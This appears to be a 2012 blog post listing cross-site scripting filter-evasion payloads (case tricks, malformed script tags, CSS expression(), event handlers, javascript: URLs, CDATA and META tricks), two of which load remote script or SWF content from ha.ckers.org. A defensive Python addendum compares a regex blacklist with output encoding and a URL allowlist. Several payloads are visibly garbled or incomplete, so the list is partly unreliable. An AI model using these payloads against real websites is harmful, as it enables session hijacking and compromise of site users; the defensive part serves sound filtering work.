admin posted on 2012-12-31 09:59:28

Introduction to Cross Site Scripting (XSS) attack techniques

1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade Regular Expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another file extension in place of .js

    <script src="bad.jpg"></script>

4. Put JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {

               background-image: url('javascript:alert("XSS");')

          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or new line to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tag

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

      Original code: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

      Original code: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. script in HTML tag

    <body onload=」alert('onload')」>

      onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in a swf

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart, then reassemble it.

    <XML ID=I><X><C>

    <!]><!]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
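
Added example, not part of the original post: a defender-side comparison of a regex blacklist with output encoding and a URL scheme allowlist, run over vectors adapted from items 1, 5, 9 and 14 (quote characters normalised). The regex, function names and the example.com URL are constructed for this illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed blacklist: case-insensitive removal of <script ...>...</script>.
NAIVE_SCRIPT_RE = re.compile(r"<script(\s[^>]*)?>.*?</script\s*>", re.I | re.S)

# Vectors adapted from items 1, 5, 9 and 14 of the list above.
SAMPLES = [
    "<sCript>alert('d')</scRipT>",
    '<SCRIPT/SRC="t.js"></SCRIPT>',
    "<body onload=alert('onload')>",
    "<img src=\"javascript:alert('XSS3')\">",
]


def naive_filter(value):
    """Blacklist approach: delete whatever the regex recognises as a script tag."""
    return NAIVE_SCRIPT_RE.sub("", value)


def blacklist_misses(samples):
    """Return the samples that pass through the blacklist with markup intact."""
    return [s for s in samples if "<" in naive_filter(s)]


def encode_html(value):
    """Output-encode for an HTML text node or a quoted attribute value."""
    return html.escape(value, quote=True)


def is_allowed_url(value, schemes=("http", "https")):
    """Scheme allowlist for values written into src/href (items 6 and 14)."""
    # Browsers ignore tab, CR and LF inside a URL, so remove control
    # characters and spaces before reading the scheme.
    cleaned = re.sub(r"[\x00-\x20]+", "", value)
    try:
        return urlsplit(cleaned).scheme.lower() in schemes
    except ValueError:
        return False


if __name__ == "__main__":
    print("passes blacklist:", blacklist_misses(SAMPLES))
    for s in SAMPLES:
        print(encode_html(s))
    for u in ("jav\tascript:alert('XSS')", "https://example.com/a.png"):
        print(repr(u), "allowed:", is_allowed_url(u))
```

Fixing the case bypass from item 1 still leaves three of the four samples untouched by the blacklist, while encoding at output turns every one of them into inert text. Encoding alone does not cover a user-supplied value placed in src or href, which is why the scheme allowlist is a separate check.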
